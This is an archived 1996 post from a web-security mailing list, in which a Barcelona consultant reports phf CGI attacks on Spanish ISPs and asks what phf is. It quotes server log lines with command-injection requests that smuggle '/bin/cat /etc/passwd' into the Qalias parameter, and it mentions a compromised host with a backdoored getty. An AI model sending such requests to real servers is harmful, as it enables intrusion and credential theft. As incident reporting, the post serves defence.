[2946] in WWW Security List Archive
'phf' cgi-bin attack
daemon@ATHENA.MIT.EDU (Jordi \"=?iso-8859-1?Q?Matem=E0tic)
Mon Sep 16 18:51:23 1996
Date: Mon, 16 Sep 1996 22:20:45 -0100
From: "Jordi \"=?iso-8859-1?Q?Matem=E0tic?=\" Salvat" <jordi@webarna.com>
To: www-security@ns2.rutgers.edu
Errors-To: owner-www-security@ns2.rutgers.edu
Many Spanish ISPs are receiving attack attempts on their WWW servers...
they detect them on their log files in entries such as:
info26.jet.es - - [04/Sep/1996:03:17:21 +0100] "GET
/cgi-bin/phf?Qalias=x%0a/bin/ls%20-la%20/ HTTP/1.0" 404 -
infovia36_bcn.tinet.fut.es - - [04/Sep/1996:08:52:05 +0100] "GET
/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 -
ia245.arrakis.es - - [04/Sep/1996:14:45:35 +0100] "GET
/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 -
modem5.mrbit.es - - [09/Sep/1996:04:38:21 +0100] "GET
/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 -
modem5.mrbit.es - - [09/Sep/1996:06:15:21 +0100] "GET
/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 -
ppp03.las.es - - [12/Sep/1996:20:17:22 +0100] "GET
/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 -
Obviously attempting to get the passwd file.
What is curious about these attacks is that they all come from different
dial-up providers, from users apparently scattered throughout Spain.
Maybe an "organized" group who meets and exchanges ideas over the I-net?
There has also been a few attempts apparently comming from the US. Of
course most providers have initiated action to find out who those
cracker-apprentices are, and warn them that what they are doing is a
delict under the new Spanish Penal Laws.
At lease one of these attacks has been successful. The hacker then
reportedly managed to find out root password (bad password choice?) and
replaced the getty and getty to leave a 'backdoor'. The hacker was
reportedly invisible to 'who' and 'last', so the only way to know
whether he was logged in was to look at the process list.
Does anyone know what this 'phf' cgi-bin is supposed to be?
Thanks for your help.
--
Jordi Salvat i Alabart
Web Edicions Barcelona
edicions i consultoria Internet
http://www.webarna.com
